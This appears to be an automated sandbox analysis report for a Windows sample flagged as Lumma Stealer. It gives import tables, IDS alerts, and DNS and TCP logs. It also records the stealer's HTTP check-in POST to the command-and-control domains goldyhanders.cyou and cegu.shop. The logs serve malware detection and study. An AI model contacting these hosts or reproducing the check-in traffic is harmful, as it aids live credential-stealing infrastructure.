                                                                                                        RT_MANIFEST0x101c3c0x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                                                                        DLLImport
                                                                                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                                                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                                                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                                                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                        EnglishUnited States
                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2025-01-12T15:29:17.263917+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549716104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:17.745513+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549716104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:17.745513+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549716104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:18.227891+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:18.651191+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549722104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:18.651191+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549722104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:19.750416+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549733104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:20.352768+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549733104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:20.991355+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549744104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:22.293507+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549750104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:23.841317+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549761104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:24.834074+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549772104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:25.839532+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549777104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:26.328028+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549777104.21.16.1443TCP
                                                                                                        2025-01-12T15:29:27.167828+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549782185.161.251.21443TCP
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 12, 2025 15:29:16.802392006 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:16.802479982 CET44349716104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:16.802563906 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:16.803654909 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:16.803692102 CET44349716104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:17.263854980 CET44349716104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:17.263916969 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.267591000 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.267602921 CET44349716104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:17.267955065 CET44349716104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:17.319858074 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.321100950 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.321100950 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.321304083 CET44349716104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:17.745523930 CET44349716104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:17.745770931 CET44349716104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:17.745853901 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.748270988 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.748322010 CET44349716104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:17.748353958 CET49716443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.748369932 CET44349716104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:17.753654957 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.753746986 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:17.753829956 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.754100084 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:17.754141092 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.227684021 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.227890968 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.228831053 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.228858948 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.229826927 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.230928898 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.230969906 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.231039047 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.651201010 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.651343107 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.651396990 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.651456118 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.651671886 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.651721001 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.651735067 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.651823997 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.651874065 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.651885986 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.651982069 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.652025938 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.652038097 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.652142048 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.652189970 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.652201891 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.655781984 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.655836105 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.655848026 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.710505009 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.710519075 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.739609003 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.739712954 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.739742041 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.739937067 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.740149021 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:18.740207911 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.756367922 CET49722443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:18.756397963 CET44349722104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:19.245029926 CET49733443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:19.245119095 CET44349733104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:19.245213032 CET49733443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:19.245517969 CET49733443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:19.245548964 CET44349733104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:19.750212908 CET44349733104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:19.750416040 CET49733443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:19.751368999 CET49733443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:19.751396894 CET44349733104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:19.751678944 CET44349733104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:19.753128052 CET49733443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:19.753267050 CET49733443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:19.753309965 CET44349733104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:20.352837086 CET44349733104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:20.353072882 CET44349733104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:20.353203058 CET49733443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:20.353305101 CET49733443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:20.353347063 CET44349733104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:20.528652906 CET49744443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:20.528749943 CET44349744104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:20.528844118 CET49744443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:20.529128075 CET49744443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:20.529165030 CET44349744104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:20.991229057 CET44349744104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:20.991354942 CET49744443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:20.992636919 CET49744443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:20.992666960 CET44349744104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:20.992943048 CET44349744104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:20.994033098 CET49744443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:20.994189978 CET49744443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:20.994235992 CET44349744104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:20.994512081 CET49744443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:21.035336971 CET44349744104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:21.598731041 CET44349744104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:21.598812103 CET44349744104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:21.598932981 CET49744443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:21.599067926 CET49744443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:21.599092960 CET44349744104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:21.839207888 CET49750443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:21.839301109 CET44349750104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:21.839390993 CET49750443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:21.839818954 CET49750443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:21.839854002 CET44349750104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:22.293360949 CET44349750104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:22.293507099 CET49750443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:22.295247078 CET49750443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:22.295259953 CET44349750104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:22.295464039 CET44349750104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:22.296765089 CET49750443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:22.296765089 CET49750443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:22.296791077 CET44349750104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:22.296912909 CET49750443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:22.296921968 CET44349750104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:23.006812096 CET44349750104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:23.006897926 CET44349750104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:23.006966114 CET49750443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:23.007215977 CET49750443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:23.007237911 CET44349750104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:23.358972073 CET49761443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:23.359010935 CET44349761104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:23.359076023 CET49761443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:23.359719038 CET49761443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:23.359736919 CET44349761104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:23.841162920 CET44349761104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:23.841316938 CET49761443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:23.853318930 CET49761443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:23.853344917 CET44349761104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:23.853749037 CET44349761104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:23.854898930 CET49761443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:23.854979992 CET49761443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:23.854993105 CET44349761104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:24.314161062 CET44349761104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:24.314233065 CET44349761104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:24.314280987 CET49761443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:24.314439058 CET49761443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:24.314457893 CET44349761104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:24.372404099 CET49772443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:24.372486115 CET44349772104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:24.372566938 CET49772443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:24.372791052 CET49772443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:24.372819901 CET44349772104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:24.833884954 CET44349772104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:24.834074020 CET49772443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:24.835184097 CET49772443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:24.835199118 CET44349772104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:24.835428953 CET44349772104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:24.836422920 CET49772443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:24.836489916 CET49772443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:24.836500883 CET44349772104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:25.360245943 CET44349772104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:25.360332012 CET44349772104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:25.360421896 CET49772443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:25.360524893 CET49772443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:25.360552073 CET44349772104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:25.363506079 CET49777443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:25.363539934 CET44349777104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:25.363779068 CET49777443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:25.364033937 CET49777443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:25.364038944 CET44349777104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:25.839464903 CET44349777104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:25.839531898 CET49777443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:25.840573072 CET49777443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:25.840580940 CET44349777104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:25.841504097 CET44349777104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:25.842526913 CET49777443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:25.842546940 CET49777443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:25.842688084 CET44349777104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:26.328069925 CET44349777104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:26.328332901 CET44349777104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:26.328392029 CET49777443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:26.328520060 CET49777443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:26.328541040 CET44349777104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:26.328553915 CET49777443192.168.2.5104.21.16.1
                                                                                                        Jan 12, 2025 15:29:26.328561068 CET44349777104.21.16.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:26.438005924 CET49782443192.168.2.5185.161.251.21
                                                                                                        Jan 12, 2025 15:29:26.438077927 CET44349782185.161.251.21192.168.2.5
                                                                                                        Jan 12, 2025 15:29:26.438184977 CET49782443192.168.2.5185.161.251.21
                                                                                                        Jan 12, 2025 15:29:26.438622952 CET49782443192.168.2.5185.161.251.21
                                                                                                        Jan 12, 2025 15:29:26.438657045 CET44349782185.161.251.21192.168.2.5
                                                                                                        Jan 12, 2025 15:29:27.167740107 CET44349782185.161.251.21192.168.2.5
                                                                                                        Jan 12, 2025 15:29:27.167828083 CET49782443192.168.2.5185.161.251.21
                                                                                                        Jan 12, 2025 15:29:27.169058084 CET49782443192.168.2.5185.161.251.21
                                                                                                        Jan 12, 2025 15:29:27.169080973 CET44349782185.161.251.21192.168.2.5
                                                                                                        Jan 12, 2025 15:29:27.169498920 CET44349782185.161.251.21192.168.2.5
                                                                                                        Jan 12, 2025 15:29:27.170433998 CET49782443192.168.2.5185.161.251.21
                                                                                                        Jan 12, 2025 15:29:27.211353064 CET44349782185.161.251.21192.168.2.5
                                                                                                        Jan 12, 2025 15:29:27.431083918 CET44349782185.161.251.21192.168.2.5
                                                                                                        Jan 12, 2025 15:29:27.431252956 CET44349782185.161.251.21192.168.2.5
                                                                                                        Jan 12, 2025 15:29:27.431332111 CET49782443192.168.2.5185.161.251.21
                                                                                                        Jan 12, 2025 15:29:27.443892956 CET49782443192.168.2.5185.161.251.21
                                                                                                        Jan 12, 2025 15:29:27.443924904 CET44349782185.161.251.21192.168.2.5
                                                                                                        Jan 12, 2025 15:29:27.443953037 CET49782443192.168.2.5185.161.251.21
                                                                                                        Jan 12, 2025 15:29:27.443969965 CET44349782185.161.251.21192.168.2.5
                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Jan 12, 2025 15:29:01.660013914 CET5739553192.168.2.51.1.1.1
                                                                                                        Jan 12, 2025 15:29:01.668454885 CET53573951.1.1.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:16.780600071 CET5650653192.168.2.51.1.1.1
                                                                                                        Jan 12, 2025 15:29:16.797352076 CET53565061.1.1.1192.168.2.5
                                                                                                        Jan 12, 2025 15:29:26.331516981 CET6424353192.168.2.51.1.1.1
                                                                                                        Jan 12, 2025 15:29:26.437103033 CET53642431.1.1.1192.168.2.5
                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                        Jan 12, 2025 15:29:01.660013914 CET192.168.2.51.1.1.10xdcaeStandard query (0)jIUAzCVEKkxMKZXfO.jIUAzCVEKkxMKZXfOA (IP address)IN (0x0001)false
                                                                                                        Jan 12, 2025 15:29:16.780600071 CET192.168.2.51.1.1.10x1029Standard query (0)goldyhanders.cyouA (IP address)IN (0x0001)false
                                                                                                        Jan 12, 2025 15:29:26.331516981 CET192.168.2.51.1.1.10xd919Standard query (0)cegu.shopA (IP address)IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Jan 12, 2025 15:29:01.668454885 CET1.1.1.1192.168.2.50xdcaeName error (3)jIUAzCVEKkxMKZXfO.jIUAzCVEKkxMKZXfOnonenoneA (IP address)IN (0x0001)false
                                                                                                        Jan 12, 2025 15:29:16.797352076 CET1.1.1.1192.168.2.50x1029No error (0)goldyhanders.cyou104.21.16.1A (IP address)IN (0x0001)false
                                                                                                        Jan 12, 2025 15:29:16.797352076 CET1.1.1.1192.168.2.50x1029No error (0)goldyhanders.cyou104.21.112.1A (IP address)IN (0x0001)false
                                                                                                        Jan 12, 2025 15:29:16.797352076 CET1.1.1.1192.168.2.50x1029No error (0)goldyhanders.cyou104.21.64.1A (IP address)IN (0x0001)false
                                                                                                        Jan 12, 2025 15:29:16.797352076 CET1.1.1.1192.168.2.50x1029No error (0)goldyhanders.cyou104.21.32.1A (IP address)IN (0x0001)false
                                                                                                        Jan 12, 2025 15:29:16.797352076 CET1.1.1.1192.168.2.50x1029No error (0)goldyhanders.cyou104.21.48.1A (IP address)IN (0x0001)false
                                                                                                        Jan 12, 2025 15:29:16.797352076 CET1.1.1.1192.168.2.50x1029No error (0)goldyhanders.cyou104.21.80.1A (IP address)IN (0x0001)false
                                                                                                        Jan 12, 2025 15:29:16.797352076 CET1.1.1.1192.168.2.50x1029No error (0)goldyhanders.cyou104.21.96.1A (IP address)IN (0x0001)false
                                                                                                        Jan 12, 2025 15:29:26.437103033 CET1.1.1.1192.168.2.50xd919No error (0)cegu.shop185.161.251.21A (IP address)IN (0x0001)false
                                                                                                        • goldyhanders.cyou
                                                                                                        • cegu.shop
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.549716104.21.16.14437696C:\Users\user\AppData\Local\Temp\224553\Luther.com
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-12 14:29:17 UTC264OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 8
                                                                                                        Host: goldyhanders.cyou
                                                                                                        2025-01-12 14:29:17 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                        Data Ascii: act=life
                                                                                                        2025-01-12 14:29:17 UTC1133INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 12 Jan 2025 14:29:17 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=70ffcoq3sqlh4hscg2lb1af04t; expires=Thu, 08 May 2025 08:15:56 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4uKkW2yDNSEXK0Vl62tTRlQyhvpe9yBjk%2Buv5AgYq95s8XnHvCUPTGVNj9I7cIcT%2Fbj3An87%2B8OF%2BrV%2F1q7eT0D2RigBzku6Gm5UgPxCfpIzzYIatqOHMhFdXddeytq6MJwhkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 900dd67f9a800fa8-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1758&min_rtt=1528&rtt_var=737&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3052&recv_bytes=908&delivery_rate=2866492&cwnd=253&unsent_bytes=0&cid=b5754f82fdca1ca4&ts=491&x=0"
                                                                                                        2025-01-12 14:29:17 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
